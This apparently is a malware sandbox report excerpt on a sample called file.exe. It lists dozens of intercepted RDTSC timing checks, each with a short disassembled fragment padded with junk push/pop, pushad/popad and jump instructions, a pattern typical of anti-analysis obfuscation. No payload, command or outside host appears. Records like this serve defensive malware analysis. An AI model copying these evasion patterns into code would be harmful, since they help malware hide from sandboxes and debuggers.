Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E7703 second address: 7E771A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C4758083h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F20E3 second address: 7F20E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F20E7 second address: 7F20EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F20EB second address: 7F20F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F20F5 second address: 7F20F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F20F9 second address: 7F20FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F20FF second address: 7F2108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0010 second address: 7F002D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F28C47EE2B6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F28C47EE2BEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F002D second address: 7F0033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0033 second address: 7F0039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0039 second address: 7F003D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0197 second address: 7F019B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F065B second address: 7F065F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F065F second address: 7F0669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0669 second address: 7F067C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C475807Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F067C second address: 7F0680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F098C second address: 7F0998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F28C4758076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F150E second address: 7F151F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F28C47EE2B6h 0x0000000a jg 00007F28C47EE2B6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1D6E second address: 7F1D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FC4AF second address: 7FC4C7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F28C47EE2B8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F28C47EE2BEh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FC4C7 second address: 7FC4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758085h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FC4E0 second address: 7FC4EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F28C47EE2B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FC932 second address: 7FC936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FCCE6 second address: 7FCD02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FCE50 second address: 7FCE6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F28C475807Fh 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80680F second address: 806836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F28C47EE2C6h 0x0000000b popad 0x0000000c jne 00007F28C47EE2BEh 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806836 second address: 80683A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80683A second address: 806840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806840 second address: 80686C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F28C4758080h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F28C4758084h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 804EA7 second address: 804EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 804EAB second address: 804EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80540E second address: 805414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805414 second address: 805422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805422 second address: 805440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007F28C47EE2B8h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007F28C47EE2B6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805440 second address: 805444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805880 second address: 805884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805884 second address: 8058B2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F28C475807Eh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F28C4758080h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8058B2 second address: 8058C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F28C47EE2B6h 0x0000000a popad 0x0000000b jno 00007F28C47EE2BCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C313 second address: 80C317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C317 second address: 80C31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81A65B second address: 81A65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8207A8 second address: 8207AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82FF0D second address: 82FF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 833A35 second address: 833A42 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 833A42 second address: 833A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F28C4758083h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 833A5F second address: 833A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 741C19 second address: 741C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 741C21 second address: 741C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 839B93 second address: 839B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F28C4758076h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 839B9F second address: 839BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 839D19 second address: 839D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 839D23 second address: 839D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83E5B4 second address: 83E5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F28C4758081h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 841058 second address: 84105E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84105E second address: 841073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F28C475807Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 841073 second address: 841079 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 841079 second address: 84107F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84107F second address: 841089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F28C47EE2B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85011B second address: 850121 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8519A5 second address: 8519A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8519A9 second address: 8519AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851822 second address: 85183B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2C3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85183B second address: 85183F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84B853 second address: 84B857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85F9F2 second address: 85FA01 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85F68A second address: 85F697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85F697 second address: 85F69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85F69B second address: 85F6AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85F6AE second address: 85F6CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758088h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85F6CC second address: 85F6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8754D5 second address: 875500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F28C4758081h 0x0000000d jmp 00007F28C4758082h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 875500 second address: 875504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 875504 second address: 87550C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87550C second address: 875528 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F28C47EE2C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 875528 second address: 87552C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 874468 second address: 87446E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87446E second address: 87449E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F28C475807Eh 0x0000000a pop edx 0x0000000b push edx 0x0000000c jmp 00007F28C4758087h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 874E19 second address: 874E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 874E1D second address: 874E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F28C4758076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F28C4758085h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 874E44 second address: 874E4E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F28C47EE2B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 874E4E second address: 874E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 875016 second address: 875029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 875029 second address: 87502D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87502D second address: 875056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C1h 0x00000007 jnp 00007F28C47EE2B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jnp 00007F28C47EE2B8h 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 875056 second address: 875065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F28C4758076h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8782E2 second address: 8782E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8782E6 second address: 8782EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8782EA second address: 8782F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8782F5 second address: 87830F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F28C475807Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87AF36 second address: 87AF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2C3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87AF4E second address: 87AF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87AF54 second address: 87AF66 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F28C47EE2B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87AF66 second address: 87AF90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov dl, EFh 0x0000000a push 00000004h 0x0000000c mov dl, 79h 0x0000000e call 00007F28C4758079h 0x00000013 push ebx 0x00000014 jl 00007F28C475807Ch 0x0000001a je 00007F28C4758076h 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edi 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87AF90 second address: 87AFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jc 00007F28C47EE2D4h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 je 00007F28C47EE2C4h 0x0000001b jmp 00007F28C47EE2BEh 0x00000020 jmp 00007F28C47EE2C1h 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d jne 00007F28C47EE2B6h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87B27D second address: 87B283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0273 second address: 4EC02A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F28C47EE2BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC02A0 second address: 4EC02BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov ch, ABh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC02BE second address: 4EC02D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 mov dl, 5Dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC02D0 second address: 4EC02D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC02D4 second address: 4EC02D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC02D8 second address: 4EC02DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC02DE second address: 4EC0302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0302 second address: 4EC031F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
